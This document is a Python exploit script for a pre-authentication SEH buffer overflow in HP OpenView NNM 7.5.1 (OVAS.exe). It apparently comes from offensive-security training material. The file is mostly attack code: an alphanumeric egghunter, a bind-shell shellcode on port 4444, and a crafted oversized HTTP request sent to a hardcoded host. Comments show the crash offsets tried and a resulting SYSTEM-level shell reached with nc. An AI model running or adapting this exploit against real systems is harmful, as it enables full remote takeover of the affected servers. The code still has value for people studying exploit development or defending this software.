#!/usr/bin/python ################################################################################ # HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow # Tested on Windows 2003 Server SP1. # Coded by Mati Aharoni # muts..at..offensive-security.com # http://www.offensive-security.com/0day/hp-nnm-ov.py.txt # [shameless plug] # This vulnerability was found, analysed and exploited # as part of a training module in "BackTrack to the Max". # http://www.offensive-security.com/ilt.php # [/shameless plug] ################################################################################# # bt 0day# python hp-nnm-ov.py # [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day) # [*] http://www.offensive-security.com # [*] Sending evil HTTP request to NNMz, ph33r # [*] Egghunter working ... # [*] Check payload results - may take up to a minute. # bt 0day# nc -v 192.168.1.111 4444 # (muts) [192.168.1.111] 4444 (krb524) open # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # C:\>whoami # whoami # nt authority\system # # C:\> # ################################################################################ # Insane, "We own all those registers, but how the heck do we get EIP" method. ################################################################################ # crash = "T"*1300 # ################################################################################# # Funky, "Lets make the stack happy and pray for EIP" overwrite method. ################################################################################# # Case 1 - Stack not happy: # crash = "T"*989 # # Case 2 - Stack happy, we own EIP - blessed by the angels above: # 0x44442638 - Happy NNM address # crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510" # 12 bytes of nasty strict alphanum shellcode possibility @EBP # ################################################################################ # Unknown "wtf, these bytes are expanding" SEH method: ################################################################################ # 0x6d356c6e - POP POP RET somewhere in NNM # crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510" # ################################################################################ # Final exploit crash SEH method: ################################################################################ # crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510" # ################################################################################ import socket import os import sys print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)" print "[*] http://www.offensive-security.com" # Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r # One egg to rule them all. egghunter=( "%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J" "MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5" "21*-q!au-q!au-oGSePAA%JMNU%521*-D" "A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1" "z1E-oRHEPAA%JMNU%521*-3s1--331--^" "TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA" "A%JMNU%521*-R222-1111-nZJ2PAA%JMN" "U%521*-1-wD-1-wD-8$GwP") alignstack="\x90"*34+"\x83\xc4\x03" # win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com # Spawned shell dies quickly as a result of a parent thread killing it. # Best shellcodes are of the "instant" type, such as adduser, etc. bindshell=("T00WT00W" + alignstack + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" "\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" "\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" "\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" "\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" "\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" "\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" "\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" "\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" "\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" "\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" "\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" "\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" "\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" "\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a") # 0x6d356c6e pop pot ret somehwere in NNM 7.5.1 evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510" buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n" buffer+="Content-Type: application/x-www-form-urlencoded\r\n" buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n" buffer+="Content-Length: 1048580\r\n\r\n" buffer+= bindshell print "[*] Sending evil HTTP request to NNMz, ph33r" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("192.168.1.111", 7510)) expl.send(buffer) expl.close() print "[*] Egghunter working ..." print "[*] Check payload results - may take up to a minute."